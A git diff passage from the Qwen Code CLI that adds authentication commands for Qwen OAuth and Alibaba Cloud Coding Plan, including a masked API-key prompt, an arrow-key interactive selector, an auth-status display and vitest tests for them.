{ + query: undefined, + model: undefined, + sandbox: undefined, + sandboxImage: undefined, + debug: undefined, + prompt: undefined, + promptInteractive: undefined, + yolo: undefined, + approvalMode: undefined, + telemetry: undefined, + checkpointing: undefined, + telemetryTarget: undefined, + telemetryOtlpEndpoint: undefined, + telemetryOtlpProtocol: undefined, + telemetryLogPrompts: undefined, + telemetryOutfile: undefined, + allowedMcpServerNames: undefined, + allowedTools: undefined, + acp: undefined, + experimentalAcp: undefined, + experimentalLsp: undefined, + experimentalHooks: undefined, + extensions: [], + listExtensions: undefined, + openaiLogging: undefined, + openaiApiKey: undefined, + openaiBaseUrl: undefined, + openaiLoggingDir: undefined, + proxy: undefined, + includeDirectories: undefined, + tavilyApiKey: undefined, + googleApiKey: undefined, + googleSearchEngineId: undefined, + webSearchDefault: undefined, + screenReader: undefined, + inputFormat: undefined, + outputFormat: undefined, + includePartialMessages: undefined, + chatRecording: undefined, + continue: undefined, + resume: undefined, + sessionId: undefined, + maxSessionTurns: undefined, + coreTools: undefined, + excludeTools: undefined, + authType: undefined, + channel: undefined, + systemPrompt: undefined, + appendSystemPrompt: undefined, + }; + + // Create a minimal config to access settings and storage + const config = await loadCliConfig( + settings.merged, + minimalArgv, + process.cwd(), + [], // No extensions for auth command + ); + + if (command === 'qwen-oauth') { + await handleQwenOAuth(config, settings); + } else if (command === 'coding-plan') { + await handleCodePlanAuth(config, settings, options); + } + + // Exit after authentication is complete + writeStdoutLine(t('Authentication completed successfully.')); + process.exit(0); + } catch (error) { + writeStderrLine(getErrorMessage(error)); + process.exit(1); + } +} + +/** + * Handles Qwen OAuth authentication + */ +async function 
handleQwenOAuth( + config: Config, + settings: LoadedSettings, +): Promise { + writeStdoutLine(t('Starting Qwen OAuth authentication...')); + + try { + await config.refreshAuth(AuthType.QWEN_OAUTH); + + // Persist the auth type + const authTypeScope = getPersistScopeForModelSelection(settings); + settings.setValue( + authTypeScope, + 'security.auth.selectedType', + AuthType.QWEN_OAUTH, + ); + + writeStdoutLine(t('Successfully authenticated with Qwen OAuth.')); + process.exit(0); + } catch (error) { + writeStderrLine( + t('Failed to authenticate with Qwen OAuth: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} + +/** + * Handles Alibaba Cloud Coding Plan authentication + */ +async function handleCodePlanAuth( + config: Config, + settings: LoadedSettings, + options: QwenAuthOptions, +): Promise { + const { region, key } = options; + + let selectedRegion: CodingPlanRegion; + let selectedKey: string; + + // If region and key are provided as options, use them + if (region && key) { + selectedRegion = + region.toLowerCase() === 'global' + ? 
CodingPlanRegion.GLOBAL + : CodingPlanRegion.CHINA; + selectedKey = key; + } else { + // Otherwise, prompt interactively + selectedRegion = await promptForRegion(); + selectedKey = await promptForKey(); + } + + writeStdoutLine(t('Processing Alibaba Cloud Coding Plan authentication...')); + + try { + // Get configuration based on region + const { template, version } = getCodingPlanConfig(selectedRegion); + + // Get persist scope + const authTypeScope = getPersistScopeForModelSelection(settings); + + // Backup settings file before modification + const settingsFile = settings.forScope(authTypeScope); + backupSettingsFile(settingsFile.path); + + // Store api-key in settings.env (unified env key) + settings.setValue(authTypeScope, `env.${CODING_PLAN_ENV_KEY}`, selectedKey); + + // Sync to process.env immediately so refreshAuth can read the apiKey + process.env[CODING_PLAN_ENV_KEY] = selectedKey; + + // Generate model configs from template + const newConfigs = template.map((templateConfig) => ({ + ...templateConfig, + envKey: CODING_PLAN_ENV_KEY, + })); + + // Get existing configs + const existingConfigs = + (settings.merged.modelProviders as Record)?.[ + AuthType.USE_OPENAI + ] || []; + + // Filter out all existing Coding Plan configs (mutually exclusive) + const nonCodingPlanConfigs = existingConfigs.filter( + (existing) => !isCodingPlanConfig(existing.baseUrl, existing.envKey), + ); + + // Add new Coding Plan configs at the beginning + const updatedConfigs = [...newConfigs, ...nonCodingPlanConfigs]; + + // Persist to modelProviders + settings.setValue( + authTypeScope, + `modelProviders.${AuthType.USE_OPENAI}`, + updatedConfigs, + ); + + // Also persist authType + settings.setValue( + authTypeScope, + 'security.auth.selectedType', + AuthType.USE_OPENAI, + ); + + // Persist coding plan region + settings.setValue(authTypeScope, 'codingPlan.region', selectedRegion); + + // Persist coding plan version (single field for backward compatibility) + 
settings.setValue(authTypeScope, 'codingPlan.version', version); + + // If there are configs, use the first one as the model + if (updatedConfigs.length > 0 && updatedConfigs[0]?.id) { + settings.setValue( + authTypeScope, + 'model.name', + (updatedConfigs[0] as ModelConfig).id, + ); + } + + // Refresh auth with the new configuration + await config.refreshAuth(AuthType.USE_OPENAI); + + writeStdoutLine( + t('Successfully authenticated with Alibaba Cloud Coding Plan.'), + ); + } catch (error) { + writeStderrLine( + t('Failed to authenticate with Coding Plan: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} + +/** + * Prompts the user to select a region using an interactive selector + */ +async function promptForRegion(): Promise { + const selector = new InteractiveSelector( + [ + { + value: CodingPlanRegion.CHINA, + label: t('中国 (China)'), + description: t('阿里云百炼 (aliyun.com)'), + }, + { + value: CodingPlanRegion.GLOBAL, + label: t('Global'), + description: t('Alibaba Cloud (alibabacloud.com)'), + }, + ], + t('Select region for Coding Plan:'), + ); + + return await selector.select(); +} + +/** + * Prompts the user to enter an API key + */ +async function promptForKey(): Promise { + // Create a simple password-style input (without echoing characters) + const stdin = process.stdin; + const stdout = process.stdout; + + stdout.write(t('Enter your Coding Plan API key: ')); + + // Set raw mode to capture keystrokes + const wasRaw = stdin.isRaw; + if (stdin.setRawMode) { + stdin.setRawMode(true); + } + stdin.resume(); + + return new Promise((resolve, reject) => { + let input = ''; + + const onData = (chunk: string) => { + for (const char of chunk) { + switch (char) { + case '\r': // Enter + case '\n': + stdin.removeListener('data', onData); + if (stdin.setRawMode) { + stdin.setRawMode(wasRaw); + } + stdout.write('\n'); // New line after input + resolve(input); + return; + case '\x03': // Ctrl+C + stdin.removeListener('data', onData); + if 
(stdin.setRawMode) { + stdin.setRawMode(wasRaw); + } + stdout.write('^C\n'); + reject(new Error('Interrupted')); + return; + case '\x08': // Backspace + case '\x7F': // Delete + if (input.length > 0) { + input = input.slice(0, -1); + // Move cursor back, print space, move back again + stdout.write('\x1B[D \x1B[D'); + } + break; + default: + // Add character to input + input += char; + // Print asterisk instead of the actual character for security + stdout.write('*'); + break; + } + } + }; + + stdin.on('data', onData); + }); +} + +/** + * Runs the interactive authentication flow + */ +export async function runInteractiveAuth() { + const selector = new InteractiveSelector( + [ + { + value: 'qwen-oauth' as const, + label: t('Qwen OAuth'), + description: t('Free · Up to 1,000 requests/day · Qwen latest models'), + }, + { + value: 'coding-plan' as const, + label: t('Alibaba Cloud Coding Plan'), + description: t( + 'Paid · Up to 6,000 requests/5 hrs · All Alibaba Cloud Coding Plan Models', + ), + }, + ], + t('Select authentication method:'), + ); + + const choice = await selector.select(); + + if (choice === 'coding-plan') { + await handleQwenAuth('coding-plan', {}); + } else { + await handleQwenAuth('qwen-oauth', {}); + } +} + +/** + * Shows the current authentication status + */ +export async function showAuthStatus(): Promise { + try { + const settings = loadSettings(); + const mergedSettings = settings.merged as MergedSettingsWithCodingPlan; + + writeStdoutLine(t('\n=== Authentication Status ===\n')); + + // Check for selected auth type + const selectedType = mergedSettings.security?.auth?.selectedType; + + if (!selectedType) { + writeStdoutLine(t('⚠️ No authentication method configured.\n')); + writeStdoutLine(t('Run one of the following commands to get started:\n')); + writeStdoutLine( + t( + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)', + ), + ); + writeStdoutLine( + t( + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding 
Plan\n', + ), + ); + writeStdoutLine(t('Or simply run:')); + writeStdoutLine( + t(' qwen auth - Interactive authentication setup\n'), + ); + process.exit(0); + } + + // Display status based on auth type + if (selectedType === AuthType.QWEN_OAUTH) { + writeStdoutLine(t('✓ Authentication Method: Qwen OAuth')); + writeStdoutLine(t(' Type: Free tier')); + writeStdoutLine(t(' Limit: Up to 1,000 requests/day')); + writeStdoutLine(t(' Models: Qwen latest models\n')); + } else if (selectedType === AuthType.USE_OPENAI) { + // Check for Coding Plan configuration + const codingPlanRegion = mergedSettings.codingPlan?.region; + const codingPlanVersion = mergedSettings.codingPlan?.version; + const modelName = mergedSettings.model?.name; + + // Check if API key is set in environment + const hasApiKey = + !!process.env[CODING_PLAN_ENV_KEY] || + !!mergedSettings.env?.[CODING_PLAN_ENV_KEY]; + + if (hasApiKey) { + writeStdoutLine( + t('✓ Authentication Method: Alibaba Cloud Coding Plan'), + ); + + if (codingPlanRegion) { + const regionDisplay = + codingPlanRegion === CodingPlanRegion.CHINA + ? 
t('中国 (China) - 阿里云百炼') + : t('Global - Alibaba Cloud'); + writeStdoutLine(t(' Region: {{region}}', { region: regionDisplay })); + } + + if (modelName) { + writeStdoutLine( + t(' Current Model: {{model}}', { model: modelName }), + ); + } + + if (codingPlanVersion) { + writeStdoutLine( + t(' Config Version: {{version}}', { + version: codingPlanVersion.substring(0, 8) + '...', + }), + ); + } + + writeStdoutLine(t(' Status: API key configured\n')); + } else { + writeStdoutLine( + t( + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)', + ), + ); + writeStdoutLine( + t(' Issue: API key not found in environment or settings\n'), + ); + writeStdoutLine(t(' Run `qwen auth coding-plan` to re-configure.\n')); + } + } else { + writeStdoutLine( + t('✓ Authentication Method: {{type}}', { type: selectedType }), + ); + writeStdoutLine(t(' Status: Configured\n')); + } + process.exit(0); + } catch (error) { + writeStderrLine( + t('Failed to check authentication status: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} diff --git a/packages/cli/src/commands/auth/interactiveSelector.test.ts b/packages/cli/src/commands/auth/interactiveSelector.test.ts new file mode 100644 index 000000000..e580cb3bf --- /dev/null +++ b/packages/cli/src/commands/auth/interactiveSelector.test.ts @@ -0,0 +1,421 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +/* eslint-disable @typescript-eslint/no-explicit-any */ + +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { InteractiveSelector } from './interactiveSelector.js'; +import { stdin, stdout } from 'node:process'; + +describe('InteractiveSelector', () => { + const mockOptions = [ + { value: 'option1', label: 'Option 1', description: 'First option' }, + { value: 'option2', label: 'Option 2', description: 'Second option' }, + { value: 'option3', label: 'Option 3', description: 'Third option' }, + ]; + + const mockPrompt = 
'Select an option:'; + + beforeEach(() => { + vi.clearAllMocks(); + }); + + afterEach(() => { + vi.restoreAllMocks(); + }); + + describe('constructor', () => { + it('should create an instance with default prompt', () => { + const selector = new InteractiveSelector(mockOptions); + expect(selector).toBeInstanceOf(InteractiveSelector); + }); + + it('should create an instance with custom prompt', () => { + const selector = new InteractiveSelector(mockOptions, mockPrompt); + expect(selector).toBeInstanceOf(InteractiveSelector); + }); + }); + + describe('select', () => { + it('should reject if raw mode is not available', async () => { + // Mock stdin without setRawMode + const originalSetRawMode = stdin.setRawMode; + (stdin as any).setRawMode = undefined; + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + await expect(selector.select()).rejects.toThrow( + 'Raw mode not available. Please run in an interactive terminal.', + ); + + // Restore + (stdin as any).setRawMode = originalSetRawMode; + }); + + it('should select first option with Enter key', async () => { + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockSetEncoding = vi.fn(); + const mockRemoveListener = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + // Simulate Enter key press + setTimeout(() => callback('\r'), 0); + return stdin; + }); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).setEncoding = mockSetEncoding; + (stdin as any).removeListener = mockRemoveListener; + (stdin as any).on = mockOn; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const result = await selector.select(); + + expect(result).toBe('option1'); + expect(mockSetRawMode).toHaveBeenCalledWith(true); + expect(mockResume).toHaveBeenCalled(); + + stdoutWriteSpy.mockRestore(); + 
}); + + it('should select second option after arrow down then Enter', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate arrow down + dataCallback('\x1B[B'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option2'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should handle arrow up navigation', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move down twice + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); + + // Move up once + dataCallback('\x1B[A'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option2'); + + stdoutWriteSpy.mockRestore(); + 
}); + + it('should reject with Ctrl+C', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate Ctrl+C + setTimeout(() => dataCallback('\x03'), 0); + + await expect(selectPromise).rejects.toThrow('Interrupted'); + }); + + it('should wrap around when navigating past last option', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move down past last option (should wrap to first) + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); // Now at option1 again (wrapped) + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should wrap around when navigating before first option', async () => { + let dataCallback!: (chunk: string) => void; + + const 
mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move up from first option (should wrap to last) + dataCallback('\x1B[A'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option3'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should ignore arrow left/right keys', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Press arrow right (should be ignored) + dataCallback('\x1B[C'); + + // Press arrow left (should be ignored) + dataCallback('\x1B[D'); + + // Press Enter - should still select first option + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should handle newline character as Enter', 
async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate newline + setTimeout(() => dataCallback('\n'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + }); + + describe('renderMenu', () => { + it('should render menu with correct formatting', () => { + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + // Access private method for testing + (selector as any).renderMenu(); + + expect(stdoutWriteSpy).toHaveBeenCalled(); + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + expect(output).toContain('Select an option:'); + expect(output).toContain('Option 1'); + expect(output).toContain('Option 2'); + expect(output).toContain('Option 3'); + expect(output).toContain('First option'); + expect(output).toContain('Second option'); + expect(output).toContain('Third option'); + expect(output).toContain('↑ ↓'); + expect(output).toContain('Enter'); + expect(output).toContain('Ctrl+C'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should highlight selected option', () => { + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + (selector as 
any).selectedIndex = 1; + (selector as any).renderMenu(); + + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + // Selected option should have cyan color code + expect(output).toContain('\x1B[36m'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should calculate correct total lines', () => { + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + // Access private method for testing + (selector as any).calculateTotalLines(); + + // Expected: 4 (prompt + empty + empty + instructions) + 3 (options) = 7 + expect((selector as any).calculateTotalLines()).toBe(7); + }); + + it('should handle options without descriptions', () => { + const simpleOptions = [ + { value: 'a', label: 'A' }, + { value: 'b', label: 'B' }, + ]; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(simpleOptions, mockPrompt); + (selector as any).renderMenu(); + + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + expect(output).toContain('A'); + expect(output).toContain('B'); + + stdoutWriteSpy.mockRestore(); + }); + }); +}); diff --git a/packages/cli/src/commands/auth/interactiveSelector.ts b/packages/cli/src/commands/auth/interactiveSelector.ts new file mode 100644 index 000000000..84b9c9f0d --- /dev/null +++ b/packages/cli/src/commands/auth/interactiveSelector.ts @@ -0,0 +1,166 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { stdin, stdout } from 'node:process'; +import { t } from '../../i18n/index.js'; + +/** + * Represents an option in the interactive selector + */ +interface Option { + value: T; + label: string; + description?: string; +} + +/** + * Interactive selector that allows users to navigate with arrow keys + */ +export class InteractiveSelector { + private selectedIndex = 0; + private isListening = false; + + constructor( + private options: Array>, + private prompt: string 
= t('Select an option:'), + ) {} + + /** + * Shows the interactive menu and waits for user selection + */ + async select(): Promise { + return new Promise((resolve, reject) => { + this.isListening = true; + + // Display initial menu + this.renderMenu(); + + // Check if stdin supports raw mode + if (!stdin.setRawMode) { + // Fallback to readline if raw mode is not available (e.g., when piped) + reject( + new Error( + t('Raw mode not available. Please run in an interactive terminal.'), + ), + ); + return; + } + + const wasRaw = stdin.isRaw; + stdin.setRawMode(true); + stdin.resume(); + stdin.setEncoding('utf8'); + + const onData = (chunk: string) => { + if (!this.isListening) return; + + for (const char of chunk) { + switch (char) { + case '\x03': // Ctrl+C + stdin.removeListener('data', onData); + stdin.setRawMode(wasRaw); + reject(new Error('Interrupted')); + return; + case '\r': // Enter + case '\n': // Newline + stdin.removeListener('data', onData); + stdin.setRawMode(wasRaw); + resolve(this.options[this.selectedIndex].value); + return; + case '\x1B': // ESC sequence + // Next character will be [, then A, B, C, or D + break; + default: + // Handle other characters if needed + break; + } + } + + // Handle escape sequences + if (chunk.startsWith('\x1B')) { + if (chunk === '\x1B[A') { + // Arrow up + this.moveUp(); + } else if (chunk === '\x1B[B') { + // Arrow down + this.moveDown(); + } else if (chunk === '\x1B[C') { + // Arrow right + // Do nothing for now + } else if (chunk === '\x1B[D') { + // Arrow left + // Do nothing for now + } + } + }; + + stdin.on('data', onData); + }); + } + + /** + * Renders the menu to stdout + */ + private renderMenu(): void { + // Calculate how many lines we need to clear + const totalLines = this.calculateTotalLines(); + + // Clear the screen area we'll be using + if (totalLines > 0) { + stdout.write(`\x1B[${totalLines}A\x1B[J`); // Move up and clear from cursor down + } + + // Write the prompt + stdout.write(`${this.prompt}\n\n`); + 
+ // Write each option - combine label and description on same line + this.options.forEach((option, index) => { + const isSelected = index === this.selectedIndex; + const indicator = isSelected ? '> ' : ' '; + const color = isSelected ? '\x1B[36m' : '\x1B[0m'; // Cyan for selected, default for others + const reset = '\x1B[0m'; + + // Combine label and description in one line + let line = `${indicator}${color}${option.label}`; + if (option.description) { + line += ` - ${option.description}`; + } + line += `${reset}\n`; + + stdout.write(line); + }); + + // Add instructions + stdout.write( + `\n${t('(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n')}`, + ); + } + + /** + * Calculates the total number of lines to clear + */ + private calculateTotalLines(): number { + // Lines for: prompt (1) + empty line (1) + options (each option takes 1 line) + empty line (1) + instructions (1) + return 4 + this.options.length; + } + + /** + * Moves selection up + */ + private moveUp(): void { + this.selectedIndex = + (this.selectedIndex - 1 + this.options.length) % this.options.length; + this.renderMenu(); + } + + /** + * Moves selection down + */ + private moveDown(): void { + this.selectedIndex = (this.selectedIndex + 1) % this.options.length; + this.renderMenu(); + } +} diff --git a/packages/cli/src/commands/auth/status.test.ts b/packages/cli/src/commands/auth/status.test.ts new file mode 100644 index 000000000..b0f2be210 --- /dev/null +++ b/packages/cli/src/commands/auth/status.test.ts @@ -0,0 +1,266 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { showAuthStatus } from './handler.js'; +import { AuthType } from '@qwen-code/qwen-code-core'; +import { CODING_PLAN_ENV_KEY } from '../../constants/codingPlan.js'; +import type { LoadedSettings } from '../../config/settings.js'; + +vi.mock('../../config/settings.js', () => ({ + 
loadSettings: vi.fn(), +})); + +vi.mock('../../utils/stdioHelpers.js', () => ({ + writeStdoutLine: vi.fn(), + writeStderrLine: vi.fn(), +})); + +import { loadSettings } from '../../config/settings.js'; +import { writeStdoutLine, writeStderrLine } from '../../utils/stdioHelpers.js'; + +describe('showAuthStatus', () => { + beforeEach(() => { + vi.clearAllMocks(); + vi.spyOn(process, 'exit').mockImplementation((() => undefined) as never); + delete process.env[CODING_PLAN_ENV_KEY]; + }); + + afterEach(() => { + vi.restoreAllMocks(); + delete process.env[CODING_PLAN_ENV_KEY]; + }); + + const createMockSettings = ( + merged: Record, + ): LoadedSettings => + ({ + merged, + system: { settings: {}, path: '/system.json' }, + systemDefaults: { settings: {}, path: '/system-defaults.json' }, + user: { settings: {}, path: '/user.json' }, + workspace: { settings: {}, path: '/workspace.json' }, + forScope: vi.fn(), + setValue: vi.fn(), + isTrusted: true, + }) as unknown as LoadedSettings; + + it('should show message when no authentication is configured', async () => { + vi.mocked(loadSettings).mockReturnValue(createMockSettings({})); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('No authentication method configured'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen auth qwen-oauth'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen auth coding-plan'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Qwen OAuth status when configured', async () => { + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.QWEN_OAUTH, + }, + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Qwen OAuth'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Free tier'), + ); + 
expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('1,000 requests/day'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Coding Plan status when configured with API key', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + version: 'abc123def456', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Alibaba Cloud Coding Plan'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('API key configured'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Coding Plan as incomplete when API key is missing', async () => { + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'global', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Incomplete'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('API key not found'), + ); + }); + + it('should show Coding Plan region for china', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('中国 (China)'), + ); + }); + + it('should show Coding Plan region for global', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + 
createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'global', + }, + model: { + name: 'qwen3-coder-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Global'), + ); + }); + + it('should show current model name', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen3.5-plus'), + ); + }); + + it('should show config version (truncated)', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + version: 'abc123def456789', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('abc123de...'), + ); + }); + + it('should handle errors and exit with code 1', async () => { + const error = new Error('Settings load failed'); + vi.mocked(loadSettings).mockImplementation(() => { + throw error; + }); + + await showAuthStatus(); + + expect(writeStderrLine).toHaveBeenCalledWith( + expect.stringContaining('Failed to check authentication status'), + ); + expect(process.exit).toHaveBeenCalledWith(1); + }); +}); diff --git a/packages/cli/src/config/config.test.ts b/packages/cli/src/config/config.test.ts index 644fc050c..207ecb8dd 100644 --- a/packages/cli/src/config/config.test.ts +++ b/packages/cli/src/config/config.test.ts @@ -241,6 +241,30 @@ describe('parseArguments', () => { 
